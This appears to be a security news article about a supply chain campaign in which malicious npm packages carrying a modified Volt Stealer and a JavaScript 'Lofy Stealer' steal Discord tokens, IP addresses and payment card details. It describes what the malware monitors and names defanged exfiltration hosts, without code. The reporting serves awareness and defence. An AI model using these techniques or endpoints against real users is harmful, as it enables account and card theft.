Kaspersky researchers have unearthed yet another supply chain attack campaign employing multiple malicious npm packages, this time targeting Discord users to steal their payment card information.
The malware employed in these attacks is a modified version of an open-source and Python-based Volt Stealer token logger and JavaScript malware dubbed Lofy Stealer.
“The Python malware is a modified version of an open-source token logger called Volt Stealer. It is intended to steal Discord tokens from infected machines and the victim’s IP address and upload them via HTTP,” reads the analysis published by Igor Kuznetsov and Leonid Bezvershenko.
The malware monitors the victims' actions, such as Discord logins, attempts to change the credentials, multi-factor authentication (MFA) toggles, or the addition of new payment methods to steal Discord accounts and payment information.
Subsequently, the harvested data is uploaded to the remote endpoint whose address is hardcoded (e.g., life.polarlabs.repl[.]co, sock.polarlabs.repl[.]co, idk.polarlabs.repl[.]co).
“The JavaScript malware we dubbed ‘Lofy Stealer’ was created to infect Discord client files in order to monitor the victim’s actions, researchers added. It detects when a user logs in, changes email or password, enables/disables multi-factor authentication (MFA), and adds new payment methods, including complete bank card details. Collected information is also uploaded to the remote endpoint whose address is hard-coded,” the analysis further read.
Kaspersky states that they are constantly monitoring the updates to repositories to rapidly scan and remove all new malicious packages.
According to researchers, this is a repetitive process among malicious npm packages, and it's just one of the seemingly endless streams of malware specifically designed to target Discord users in recent years with info stealers.
For example, in 2019, malware dubbed Spidey Bot was employed to alter the Windows Discord user to backdoor it and deploy an information-stealing trojan. Last year, malicious npm and PyPI libraries were also employed to target Discord users, steal their user tokens and browser information, and deploy MBRLocker data wiping malware called Monster Ransomware.
Earlier this year, JFrog researchers uncovered multiple malicious packages in the NPM registry particularly targeting several popular media, logistics, and industrial companies based in Germany to carry out supply chain assaults.